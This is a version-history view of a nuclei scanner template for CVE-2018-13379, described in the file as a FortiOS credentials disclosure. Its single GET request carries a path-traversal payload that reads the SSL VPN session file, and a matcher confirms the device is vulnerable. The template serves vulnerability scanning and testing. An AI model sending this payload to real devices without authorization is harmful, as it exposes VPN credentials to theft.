nuclei-templates/cves/2018/CVE-2018-13379.yaml

17 lines
338 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-13379
2020-04-22 06:42:01 +00:00
info:
2020-06-22 13:35:37 +00:00
name: FortiOS - Credentials Disclosure
2020-04-22 06:42:01 +00:00
author: organiccrap
severity: high
tags: cve,cve2018,fortios
2020-04-22 06:42:01 +00:00
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
2020-04-22 06:42:01 +00:00
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
2021-02-23 20:47:27 +00:00
- "var fgt_lang"